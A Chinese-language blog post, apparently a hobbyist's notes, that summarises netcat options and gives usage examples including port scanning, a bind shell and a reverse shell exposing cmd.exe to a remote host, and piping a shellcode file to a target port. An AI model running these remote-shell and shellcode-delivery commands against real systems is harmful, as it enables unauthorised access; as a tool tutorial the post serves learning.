最近在研究BT5 和Metasploit。
感覺以前使用的什麼暗組***工具包、黑防***工具包啊,全都是浮雲。有時候還得考慮用那些***是不是有後門。
剛用到NC,就打算把NC的命令做一下總結。
NC 一般來說包括兩種用法,一是主動連接到別的地方,另外一種是在本地進行監聽。命令格式如下:
useage:
connect to somwhere: nc[-option] hostname ports[s] [ports] ...
listen for inbound: nc -l -p port [-option] [hostname] [port]
選項
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
想要連接到某處: nc [-options] hostname port[s] [ports] …
綁定端口等待連接: nc -l -p port [-options] [hostname] [port]
參數:
-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式,用於入站連接
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 任意指定本地及遠程端口
-s addr 本地源地址
-u UDP模式
-v 詳細輸出——用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉——用於掃描時
其中端口號可以指定一個或者用lo-hi式的指定範圍
NC常被用作***工具。主要用法如下
1)連接到REMOTE主機,例子: 格式:nc -nvv 192.168.x.x 80 講解:連到192.168.x.x的TCP80端口
2)監聽LOCAL主機,例子: 格式:nc -l -p 80 講解:監聽本機的TCP80端口
3)掃描遠程主機,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 講解:掃描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主機綁定SHELL,例子: 格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 講解:綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354端口
5)REMOTE主機綁定SHELL並反向連接,例子: 格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 講解:綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354端口 以上爲最基本的幾種用法(其實NC的用法還有很多, 當配合管道命令"|"與重定向命令"<"、">"等等命令功能更強大......)。
高級用法:
6)作***程序用,例子: 格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc-nvv192.168.x.x80講解:連接到192.168.x.x的80端口,並在其管道中發送'c:\ex ploit.txt'的內容(兩種格式確有相同的效果, 真是有異曲同工之妙:P) 附:'c:\exploit.txt'爲shellcode等
7)作蜜罐用[1],例子: 格式:nc -L -p 80 講解:使用'-L'(注意L是大寫)可以不停地監聽某一個端口,直到ctrl+c爲止
8)作蜜罐用[2],例子: 格式:nc -L -p 80>c:\log.txt 講解:使用'-L'可以不停地監聽某一個端口,直到ctrl+c爲止,同時把結果輸出到'c:\log.txt'中,如果把'& gt;' 改爲'>>'即可以追加日誌 附:'c:\log.txt'爲日誌等
9)作蜜罐用[3],例子: 格式1:nc -L -p 80
格式2:type.exe c:\honeypot.txt|nc -L -p 80 講解:使用'-L'可以不停地監聽某一個端口,直到ctrl+c爲止,並把'c:\honeypot.txt'的內容'送'入其 管道中